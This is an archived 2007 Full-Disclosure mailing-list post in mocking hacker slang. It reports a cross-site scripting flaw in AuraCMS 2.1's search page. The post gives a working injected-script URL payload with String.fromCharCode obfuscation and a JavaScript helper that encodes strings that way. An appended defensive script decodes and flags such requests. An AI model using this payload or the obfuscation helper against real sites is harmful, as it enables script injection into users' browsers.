[Full-disclosure] 0day0day0day0day AURACMS XSS!! LATEST VERSION!!! 0day0day0day0day

2007-11-14T00:00:00
ID SECURITYVULNS:DOC:18412
Type securityvulns
Reporter Securityvulns
Modified 2007-11-14T00:00:00

Description

0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day
0day0day0day0day
0day0day0day0day!!!!!!!!!!!!!!!!!!!!! BROUGHT 2 U BY UlTRa HAQRS 4 AL7 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
0day0day0day0dayTITle!!:::::::::::::AURA CMS 2.1 XSS(cr0ss siTE SCRipt1ng!!!!)
0day0day0day0dayBY!!::::::::::::::::HAQ MASt4r!!!
0day0day0day0dayREQUIRE!!:::::::::Wind0zeeee s3rv3r & r3gister_gl0bals on!!!!!
0day0day0day0dayXPL0iT!!::::::::::::http://localhost/audit/auracms/content/search.PHP?tengah=%3Cscript%3Ealert(String.fromCharCode(85,108,84,82,97,32,72,65,81,82,83,32,52,32,65,76,55,32,115,116,49,108,108,32,114,117,108,51,32,116,101,104,32,115,99,51,110,101,33,33,33,33));%3C/script%3E<!--
0day0day0day0day
0day0day0day0day
0day0day0day0day!!!!!!!!!!!!!!!!!!!!! OMGzz, l33t functi0n discl0sure !!!!!!!!!!!!!!!!!!!!!
0day0day0day0day cr3ate m4d XSS 0dayz w. th15
0day0day0day0day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0day0day0day0day

function toCharCode(string){
    var char="String.fromCharCode(";
    for(var idx = 0; idx < string.length; idx++) {
        char += string.charCodeAt(idx) + (idx == string.length-1 ? "" : ",");
    }
    return char+");";
}

0day0day0day0day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0day0day0day0day
0day0day0day0day
0day0day0day0day!!!!!!!!!!!!!!!!!!!!! M4d Pr0Ps 2 aL7 UH4A m3mbers - w3 rule da sc3n3 !!!!!!!!!!!!!!!!!!!!!
0day0day0day0day
0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
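
For triage of requests like the one in the post, the following added example (not part of the original post or of AuraCMS) percent-decodes each query parameter, flags values carrying markup, and expands String.fromCharCode(...) calls into the text they build. The function names and the benign sample URL are assumptions made for illustration.

```javascript
// Added example (not from the original post): log-triage helper.

// Replace each String.fromCharCode(n,n,...) call with the literal it builds.
function expandFromCharCode(text) {
  return text.replace(/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g, (_, list) => {
    const codes = list.split(",").filter((s) => s.trim() !== "").map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Log lines can carry malformed percent-escapes; fall back to the raw text.
function safeDecode(raw) {
  try {
    return decodeURIComponent(raw.replace(/\+/g, " "));
  } catch (e) {
    return raw;
  }
}

// Return one finding per query parameter that carries markup or
// char-code obfuscation; an empty array means nothing was flagged.
function triageUrl(url) {
  const q = url.indexOf("?");
  if (q === -1) return [];
  const findings = [];
  for (const pair of url.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = safeDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = safeDecode(eq === -1 ? "" : pair.slice(eq + 1));
    const hasMarkup = /<\s*\/?\s*[a-z!]/i.test(value);
    const expanded = expandFromCharCode(value);
    const obfuscated = expanded !== value;
    if (hasMarkup || obfuscated) findings.push({ name, hasMarkup, obfuscated, expanded });
  }
  return findings;
}

// The request as it appears in the post, plus a constructed benign search.
const POSTED = "http://localhost/audit/auracms/content/search.PHP?tengah=%3Cscript%3Ealert(String.fromCharCode(85,108,84,82,97,32,72,65,81,82,83,32,52,32,65,76,55,32,115,116,49,108,108,32,114,117,108,51,32,116,101,104,32,115,99,51,110,101,33,33,33,33));%3C/script%3E<!--";
const BENIGN = "http://localhost/audit/auracms/content/search.PHP?tengah=hello+world"; // constructed

console.log(triageUrl(POSTED), triageUrl(BENIGN));
```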